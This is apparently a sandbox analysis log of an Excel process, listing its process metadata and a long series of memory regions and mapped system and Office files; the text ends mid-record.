# Flog Txt Version 1 # Analyzer Version: 2.2.1 # Analyzer Build Date: May 28 2018 14:14:40 # Log Creation Date: 26.06.2018 20:58:15.808 Process: id = "1" image_name = "excel.exe" filename = "c:\\program files\\microsoft office\\office16\\excel.exe" page_root = "0x38da3000" os_pid = "0xed8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE\"" cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\" os_username = "X2VS1CUM\\Nd9E1FYi" os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 143 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 144 start_va = 0x818fe00000 end_va = 0x818fffffff entry_point = 0x0 region_type = private name = "private_0x000000818fe00000" filename = "" Region: id = 145 start_va = 0x8190000000 end_va = 0x81900fffff entry_point = 0x0 region_type = private name = "private_0x0000008190000000" filename = "" Region: id = 146 start_va = 0x8190100000 end_va = 0x81901fffff entry_point = 0x0 region_type = private name = "private_0x0000008190100000" filename = "" Region: id = 147 start_va = 0x8190200000 end_va = 0x81902fffff entry_point = 0x0 region_type = private name = "private_0x0000008190200000" filename = "" Region: id = 148 start_va = 0x8190300000 end_va = 0x81903fffff entry_point = 0x0 region_type = private name = "private_0x0000008190300000" filename = "" Region: id = 149 start_va = 0x8190400000 end_va = 0x81904fffff entry_point = 0x0 region_type = private name = "private_0x0000008190400000" filename = "" Region: id = 150 start_va = 0x8190500000 end_va = 0x81905fffff entry_point = 0x0 region_type = private name = "private_0x0000008190500000" filename = "" Region: id = 151 start_va = 0x8190600000 end_va = 0x81906fffff entry_point = 0x0 region_type = private name = "private_0x0000008190600000" filename = "" Region: id = 152 start_va = 0x8190700000 end_va = 0x81907fffff entry_point = 0x0 region_type = private name = "private_0x0000008190700000" filename = "" Region: id = 153 start_va = 0x8190800000 end_va = 0x81908fffff entry_point = 0x0 region_type = private name = "private_0x0000008190800000" filename = "" Region: id = 154 start_va = 0x8190900000 end_va = 0x81909fffff entry_point = 0x0 region_type = private name = "private_0x0000008190900000" filename = "" Region: id = 155 start_va = 0x8190b00000 end_va = 0x8190bfffff entry_point = 0x0 region_type = private name = "private_0x0000008190b00000" filename = "" Region: id = 156 start_va = 0x8190c00000 end_va = 0x8190cfffff entry_point = 0x0 region_type = private name = "private_0x0000008190c00000" filename = "" Region: id = 157 start_va = 0x8190d00000 end_va = 0x8190dfffff entry_point = 0x0 region_type = private name = "private_0x0000008190d00000" filename = "" Region: id = 158 start_va = 0x8190f00000 end_va = 0x8190ffffff entry_point = 0x0 region_type = private name = "private_0x0000008190f00000" filename = "" Region: id = 159 start_va = 0x8191000000 end_va = 0x81910fffff entry_point = 0x0 region_type = private name = "private_0x0000008191000000" filename = "" Region: id = 160 start_va = 0x8191100000 end_va = 0x81911fffff entry_point = 0x0 region_type = private name = "private_0x0000008191100000" filename = "" Region: id = 161 start_va = 0x8191200000 end_va = 0x81912fffff entry_point = 0x0 region_type = private name = "private_0x0000008191200000" filename = "" Region: id = 162 start_va = 0x8191300000 end_va = 0x81913fffff entry_point = 0x0 region_type = private name = "private_0x0000008191300000" filename = "" Region: id = 163 start_va = 0x8191400000 end_va = 0x81914fffff entry_point = 0x0 region_type = private name = "private_0x0000008191400000" filename = "" Region: id = 164 start_va = 0x8191500000 end_va = 0x81915fffff entry_point = 0x0 region_type = private name = "private_0x0000008191500000" filename = "" Region: id = 165 start_va = 0x8191600000 end_va = 0x81916fffff entry_point = 0x0 region_type = private name = "private_0x0000008191600000" filename = "" Region: id = 166 start_va = 0x8191700000 end_va = 0x81917fffff entry_point = 0x0 region_type = private name = "private_0x0000008191700000" filename = "" Region: id = 167 start_va = 0x8191800000 end_va = 0x81918fffff entry_point = 0x0 region_type = private name = "private_0x0000008191800000" filename = "" Region: id = 168 start_va = 0x8191900000 end_va = 0x81919fffff entry_point = 0x0 region_type = private name = "private_0x0000008191900000" filename = "" Region: id = 169 start_va = 0x8191a00000 end_va = 0x8191afffff entry_point = 0x0 region_type = private name = "private_0x0000008191a00000" filename = "" Region: id = 170 start_va = 0x8191b00000 end_va = 0x8191bfffff entry_point = 0x0 region_type = private name = "private_0x0000008191b00000" filename = "" Region: id = 171 start_va = 0x8191c00000 end_va = 0x8191cfffff entry_point = 0x0 region_type = private name = "private_0x0000008191c00000" filename = "" Region: id = 172 start_va = 0x8191e00000 end_va = 0x8191efffff entry_point = 0x0 region_type = private name = "private_0x0000008191e00000" filename = "" Region: id = 173 start_va = 0x8191f00000 end_va = 0x8191ffffff entry_point = 0x0 region_type = private name = "private_0x0000008191f00000" filename = "" Region: id = 174 start_va = 0x8192000000 end_va = 0x81920fffff entry_point = 0x0 region_type = private name = "private_0x0000008192000000" filename = "" Region: id = 175 start_va = 0x20f8a380000 end_va = 0x20f8a38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a380000" filename = "" Region: id = 176 start_va = 0x20f8a390000 end_va = 0x20f8a396fff entry_point = 0x0 region_type = private name = "private_0x0000020f8a390000" filename = "" Region: id = 177 start_va = 0x20f8a3a0000 end_va = 0x20f8a3b4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a3a0000" filename = "" Region: id = 178 start_va = 0x20f8a3c0000 end_va = 0x20f8a3c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a3c0000" filename = "" Region: id = 179 start_va = 0x20f8a3d0000 end_va = 0x20f8a3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a3d0000" filename = "" Region: id = 180 start_va = 0x20f8a3e0000 end_va = 0x20f8a3e1fff entry_point = 0x0 region_type = private name = "private_0x0000020f8a3e0000" filename = "" Region: id = 181 start_va = 0x20f8a3f0000 end_va = 0x20f8a4adfff entry_point = 0x20f8a3f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 182 start_va = 0x20f8a4b0000 end_va = 0x20f8a4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a4b0000" filename = "" Region: id = 183 start_va = 0x20f8a4c0000 end_va = 0x20f8a4c6fff entry_point = 0x0 region_type = private name = "private_0x0000020f8a4c0000" filename = "" Region: id = 184 start_va = 0x20f8a4d0000 end_va = 0x20f8a4d0fff entry_point = 0x0 region_type = private name = "private_0x0000020f8a4d0000" filename = "" Region: id = 185 start_va = 0x20f8a4e0000 end_va = 0x20f8a4e0fff entry_point = 0x0 region_type = private name = "private_0x0000020f8a4e0000" filename = "" Region: id = 186 start_va = 0x20f8a4f0000 end_va = 0x20f8a4f0fff entry_point = 0x0 region_type = private name = "private_0x0000020f8a4f0000" filename = "" Region: id = 187 start_va = 0x20f8a500000 end_va = 0x20f8a500fff entry_point = 0x0 region_type = private name = "private_0x0000020f8a500000" filename = "" Region: id = 188 start_va = 0x20f8a510000 end_va = 0x20f8a60ffff entry_point = 0x0 region_type = private name = "private_0x0000020f8a510000" filename = "" Region: id = 189 start_va = 0x20f8a610000 end_va = 0x20f8a611fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a610000" filename = "" Region: id = 190 start_va = 0x20f8a620000 end_va = 0x20f8a62ffff entry_point = 0x0 region_type = private name = "private_0x0000020f8a620000" filename = "" Region: id = 191 start_va = 0x20f8a630000 end_va = 0x20f8a631fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a630000" filename = "" Region: id = 192 start_va = 0x20f8a640000 end_va = 0x20f8a641fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a640000" filename = "" Region: id = 193 start_va = 0x20f8a650000 end_va = 0x20f8a651fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a650000" filename = "" Region: id = 194 start_va = 0x20f8a660000 end_va = 0x20f8a661fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a660000" filename = "" Region: id = 195 start_va = 0x20f8a670000 end_va = 0x20f8a671fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a670000" filename = "" Region: id = 196 start_va = 0x20f8a680000 end_va = 0x20f8a680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a680000" filename = "" Region: id = 197 start_va = 0x20f8a690000 end_va = 0x20f8a691fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a690000" filename = "" Region: id = 198 start_va = 0x20f8a6a0000 end_va = 0x20f8a6cdfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a6a0000" filename = "" Region: id = 199 start_va = 0x20f8a6d0000 end_va = 0x20f8a6dffff entry_point = 0x0 region_type = private name = "private_0x0000020f8a6d0000" filename = "" Region: id = 200 start_va = 0x20f8a6e0000 end_va = 0x20f8a867fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a6e0000" filename = "" Region: id = 201 start_va = 0x20f8a870000 end_va = 0x20f8a9f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8a870000" filename = "" Region: id = 202 start_va = 0x20f8aa00000 end_va = 0x20f8bdfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8aa00000" filename = "" Region: id = 203 start_va = 0x20f8be00000 end_va = 0x20f8be00fff entry_point = 0x0 region_type = private name = "private_0x0000020f8be00000" filename = "" Region: id = 204 start_va = 0x20f8be10000 end_va = 0x20f8be10fff entry_point = 0x0 region_type = private name = "private_0x0000020f8be10000" filename = "" Region: id = 205 start_va = 0x20f8be20000 end_va = 0x20f8bedbfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8be20000" filename = "" Region: id = 206 start_va = 0x20f8bee0000 end_va = 0x20f8befffff entry_point = 0x0 region_type = private name = "private_0x0000020f8bee0000" filename = "" Region: id = 207 start_va = 0x20f8bf00000 end_va = 0x20f8c0b8fff entry_point = 0x20f8bf00000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 208 start_va = 0x20f8c0c0000 end_va = 0x20f8c0c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8c0c0000" filename = "" Region: id = 209 start_va = 0x20f8c0d0000 end_va = 0x20f8c0d6fff entry_point = 0x0 region_type = private name = "private_0x0000020f8c0d0000" filename = "" Region: id = 210 start_va = 0x20f8c0e0000 end_va = 0x20f8c0e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8c0e0000" filename = "" Region: id = 211 start_va = 0x20f8c0f0000 end_va = 0x20f8c1effff entry_point = 0x0 region_type = private name = "private_0x0000020f8c0f0000" filename = "" Region: id = 212 start_va = 0x20f8c1f0000 end_va = 0x20f8c1f0fff entry_point = 0x0 region_type = private name = "private_0x0000020f8c1f0000" filename = "" Region: id = 213 start_va = 0x20f8c200000 end_va = 0x20f8c200fff entry_point = 0x0 region_type = private name = "private_0x0000020f8c200000" filename = "" Region: id = 214 start_va = 0x20f8c210000 end_va = 0x20f8c210fff entry_point = 0x0 region_type = private name = "private_0x0000020f8c210000" filename = "" Region: id = 215 start_va = 0x20f8c220000 end_va = 0x20f8c22efff entry_point = 0x20f8c220000 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 216 start_va = 0x20f8c230000 end_va = 0x20f8c236fff entry_point = 0x0 region_type = private name = "private_0x0000020f8c230000" filename = "" Region: id = 217 start_va = 0x20f8c240000 end_va = 0x20f8c240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8c240000" filename = "" Region: id = 218 start_va = 0x20f8c250000 end_va = 0x20f8c25ffff entry_point = 0x0 region_type = private name = "private_0x0000020f8c250000" filename = "" Region: id = 219 start_va = 0x20f8c260000 end_va = 0x20f8c264fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8c260000" filename = "" Region: id = 220 start_va = 0x20f8c270000 end_va = 0x20f8c270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f8c270000" filename = "" Region: id = 221 start_va = 0x20f8c280000 end_va = 0x20f8c28ffff entry_point = 0x0 region_type = private name = "private_0x0000020f8c280000" filename = "" Region: id = 222 start_va = 0x20f8c290000 end_va = 0x20f8c597fff entry_point = 0x20f8c290000 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 223 start_va = 0x20f8c5a0000 end_va = 0x20f8cec0fff entry_point = 0x20f8c5a0000 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 224 start_va = 0x20f8ced0000 end_va = 0x20f91d0efff entry_point = 0x20f8ced0000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 225 start_va = 0x20f91d10000 end_va = 0x20f92d51fff entry_point = 0x20f91d10000 region_type = mapped_file name = "xlintl32.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\1033\\xlintl32.dll") Region: id = 226 start_va = 0x20f92d60000 end_va = 0x20f93096fff entry_point = 0x20f92d60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 227 start_va = 0x20f930a0000 end_va = 0x20f93591fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f930a0000" filename = "" Region: id = 228 start_va = 0x20f935a0000 end_va = 0x20f935a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f935a0000" filename = "" Region: id = 229 start_va = 0x20f935b0000 end_va = 0x20f935b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f935b0000" filename = "" Region: id = 230 start_va = 0x20f935c0000 end_va = 0x20f935c0fff entry_point = 0x0 region_type = private name = "private_0x0000020f935c0000" filename = "" Region: id = 231 start_va = 0x20f935d0000 end_va = 0x20f935d0fff entry_point = 0x0 region_type = private name = "private_0x0000020f935d0000" filename = "" Region: id = 232 start_va = 0x20f935e0000 end_va = 0x20f935e0fff entry_point = 0x0 region_type = private name = "private_0x0000020f935e0000" filename = "" Region: id = 233 start_va = 0x20f935f0000 end_va = 0x20f935f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f935f0000" filename = "" Region: id = 234 start_va = 0x20f93600000 end_va = 0x20f93600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f93600000" filename = "" Region: id = 235 start_va = 0x20f93610000 end_va = 0x20f93610fff entry_point = 0x0 region_type = private name = "private_0x0000020f93610000" filename = "" Region: id = 236 start_va = 0x20f93620000 end_va = 0x20f93620fff entry_point = 0x0 region_type = private name = "private_0x0000020f93620000" filename = "" Region: id = 237 start_va = 0x20f93630000 end_va = 0x20f9363ffff entry_point = 0x0 region_type = private name = "private_0x0000020f93630000" filename = "" Region: id = 238 start_va = 0x20f93640000 end_va = 0x20f937bafff entry_point = 0x20f93640000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 239 start_va = 0x20f937c0000 end_va = 0x20f93fbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f937c0000" filename = "" Region: id = 240 start_va = 0x20f93fc0000 end_va = 0x20f940bffff entry_point = 0x0 region_type = private name = "private_0x0000020f93fc0000" filename = "" Region: id = 241 start_va = 0x20f940c0000 end_va = 0x20f942bffff entry_point = 0x0 region_type = private name = "private_0x0000020f940c0000" filename = "" Region: id = 242 start_va = 0x20f942c0000 end_va = 0x20f943bffff entry_point = 0x0 region_type = private name = "private_0x0000020f942c0000" filename = "" Region: id = 243 start_va = 0x20f943c0000 end_va = 0x20f9444bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f943c0000" filename = "" Region: id = 244 start_va = 0x20f94450000 end_va = 0x20f94450fff entry_point = 0x0 region_type = private name = "private_0x0000020f94450000" filename = "" Region: id = 245 start_va = 0x20f94460000 end_va = 0x20f9446bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94460000" filename = "" Region: id = 246 start_va = 0x20f94470000 end_va = 0x20f94471fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94470000" filename = "" Region: id = 247 start_va = 0x20f94480000 end_va = 0x20f9448bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94480000" filename = "" Region: id = 248 start_va = 0x20f94490000 end_va = 0x20f944a1fff entry_point = 0x20f94490000 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 249 start_va = 0x20f944b0000 end_va = 0x20f944bcfff entry_point = 0x20f944b0000 region_type = mapped_file name = "comdlg32.dll.mui" filename = "\\Windows\\System32\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\comdlg32.dll.mui") Region: id = 250 start_va = 0x20f944c0000 end_va = 0x20f944c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f944c0000" filename = "" Region: id = 251 start_va = 0x20f944d0000 end_va = 0x20f944d0fff entry_point = 0x0 region_type = private name = "private_0x0000020f944d0000" filename = "" Region: id = 252 start_va = 0x20f944e0000 end_va = 0x20f944e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f944e0000" filename = "" Region: id = 253 start_va = 0x20f944f0000 end_va = 0x20f944f6fff entry_point = 0x20f944f0000 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 254 start_va = 0x20f94500000 end_va = 0x20f94503fff entry_point = 0x0 region_type = private name = "private_0x0000020f94500000" filename = "" Region: id = 255 start_va = 0x20f94510000 end_va = 0x20f94513fff entry_point = 0x0 region_type = private name = "private_0x0000020f94510000" filename = "" Region: id = 256 start_va = 0x20f94520000 end_va = 0x20f94523fff entry_point = 0x0 region_type = private name = "private_0x0000020f94520000" filename = "" Region: id = 257 start_va = 0x20f94530000 end_va = 0x20f94530fff entry_point = 0x0 region_type = private name = "private_0x0000020f94530000" filename = "" Region: id = 258 start_va = 0x20f94540000 end_va = 0x20f94542fff entry_point = 0x0 region_type = private name = "private_0x0000020f94540000" filename = "" Region: id = 259 start_va = 0x20f94550000 end_va = 0x20f9456efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94550000" filename = "" Region: id = 260 start_va = 0x20f94570000 end_va = 0x20f9458efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94570000" filename = "" Region: id = 261 start_va = 0x20f94590000 end_va = 0x20f94590fff entry_point = 0x0 region_type = private name = "private_0x0000020f94590000" filename = "" Region: id = 262 start_va = 0x20f945a0000 end_va = 0x20f945a0fff entry_point = 0x0 region_type = private name = "private_0x0000020f945a0000" filename = "" Region: id = 263 start_va = 0x20f945b0000 end_va = 0x20f945b0fff entry_point = 0x0 region_type = private name = "private_0x0000020f945b0000" filename = "" Region: id = 264 start_va = 0x20f945c0000 end_va = 0x20f949bffff entry_point = 0x0 region_type = private name = "private_0x0000020f945c0000" filename = "" Region: id = 265 start_va = 0x20f949c0000 end_va = 0x20f949c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f949c0000" filename = "" Region: id = 266 start_va = 0x20f949d0000 end_va = 0x20f949d0fff entry_point = 0x0 region_type = private name = "private_0x0000020f949d0000" filename = "" Region: id = 267 start_va = 0x20f949e0000 end_va = 0x20f94a55fff entry_point = 0x20f949e0000 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 268 start_va = 0x20f94a60000 end_va = 0x20f95a5ffff entry_point = 0x20f94a60000 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 269 start_va = 0x20f95a60000 end_va = 0x20f9625ffff entry_point = 0x20f95a60000 region_type = mapped_file name = "~fontcache-s-1-5-21-2172869166-1497266965-2109836178-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-2172869166-1497266965-2109836178-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-2172869166-1497266965-2109836178-1000.dat") Region: id = 270 start_va = 0x20f96260000 end_va = 0x20f9633efff entry_point = 0x20f96260000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 271 start_va = 0x20f96340000 end_va = 0x20f96381fff entry_point = 0x20f96340000 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\System32\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\d2d1.dll.mui") Region: id = 272 start_va = 0x20f96390000 end_va = 0x20f9678ffff entry_point = 0x0 region_type = private name = "private_0x0000020f96390000" filename = "" Region: id = 273 start_va = 0x20f96790000 end_va = 0x20f96f8ffff entry_point = 0x0 region_type = private name = "private_0x0000020f96790000" filename = "" Region: id = 274 start_va = 0x20f96f90000 end_va = 0x20f97063fff entry_point = 0x20f96f90000 region_type = mapped_file name = "segoeuil.ttf" filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf") Region: id = 275 start_va = 0x20f97070000 end_va = 0x20f97152fff entry_point = 0x20f97070000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 276 start_va = 0x20f97160000 end_va = 0x20f9723bfff entry_point = 0x20f97160000 region_type = mapped_file name = "segoeuib.ttf" filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf") Region: id = 277 start_va = 0x20f97240000 end_va = 0x20f97240fff entry_point = 0x0 region_type = private name = "private_0x0000020f97240000" filename = "" Region: id = 278 start_va = 0x20f97250000 end_va = 0x20f97325fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f97250000" filename = "" Region: id = 279 start_va = 0x20f97330000 end_va = 0x20f97330fff entry_point = 0x0 region_type = private name = "private_0x0000020f97330000" filename = "" Region: id = 280 start_va = 0x20f97340000 end_va = 0x20f97375fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f97340000" filename = "" Region: id = 281 start_va = 0x20f97380000 end_va = 0x20f9738ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f97380000" filename = "" Region: id = 282 start_va = 0x20f97390000 end_va = 0x20f9739ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f97390000" filename = "" Region: id = 283 start_va = 0x20f973a0000 end_va = 0x20f973affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f973a0000" filename = "" Region: id = 284 start_va = 0x20f973b0000 end_va = 0x20f977b7fff entry_point = 0x0 region_type = private name = "private_0x0000020f973b0000" filename = "" Region: id = 285 start_va = 0x20f977c0000 end_va = 0x20f97bd0fff entry_point = 0x0 region_type = private name = "private_0x0000020f977c0000" filename = "" Region: id = 286 start_va = 0x20f97be0000 end_va = 0x20f97fe2fff entry_point = 0x0 region_type = private name = "private_0x0000020f97be0000" filename = "" Region: id = 287 start_va = 0x20f97ff0000 end_va = 0x20f97ff0fff entry_point = 0x0 region_type = private name = "private_0x0000020f97ff0000" filename = "" Region: id = 288 start_va = 0x20f98000000 end_va = 0x20f98000fff entry_point = 0x0 region_type = private name = "private_0x0000020f98000000" filename = "" Region: id = 289 start_va = 0x20f98010000 end_va = 0x20f9808ffff entry_point = 0x0 region_type = private name = "private_0x0000020f98010000" filename = "" Region: id = 290 start_va = 0x20f98090000 end_va = 0x20f980a0fff entry_point = 0x20f98090000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 291 start_va = 0x20f980b0000 end_va = 0x20f990effff entry_point = 0x20f980b0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 292 start_va = 0x20f990f0000 end_va = 0x20f990f3fff entry_point = 0x20f990f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 293 start_va = 0x20f99100000 end_va = 0x20f9911cfff entry_point = 0x20f99100000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000023.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000023.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000023.db") Region: id = 294 start_va = 0x20f99120000 end_va = 0x20f99121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99120000" filename = "" Region: id = 295 start_va = 0x20f99130000 end_va = 0x20f99130fff entry_point = 0x0 region_type = private name = "private_0x0000020f99130000" filename = "" Region: id = 296 start_va = 0x20f99140000 end_va = 0x20f99140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99140000" filename = "" Region: id = 297 start_va = 0x20f99150000 end_va = 0x20f99153fff entry_point = 0x20f99150000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 298 start_va = 0x20f99160000 end_va = 0x20f9935ffff entry_point = 0x0 region_type = private name = "private_0x0000020f99160000" filename = "" Region: id = 299 start_va = 0x20f99360000 end_va = 0x20f9981cfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99360000" filename = "" Region: id = 300 start_va = 0x20f99820000 end_va = 0x20f99cdcfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99820000" filename = "" Region: id = 301 start_va = 0x20f99ce0000 end_va = 0x20f9a0dafff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99ce0000" filename = "" Region: id = 302 start_va = 0x20f9a0e0000 end_va = 0x20f9a124fff entry_point = 0x20f9a0e0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 303 start_va = 0x20f9a130000 end_va = 0x20f9a1bdfff entry_point = 0x20f9a130000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 304 start_va = 0x20f9a1c0000 end_va = 0x20f9a1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9a1c0000" filename = "" Region: id = 305 start_va = 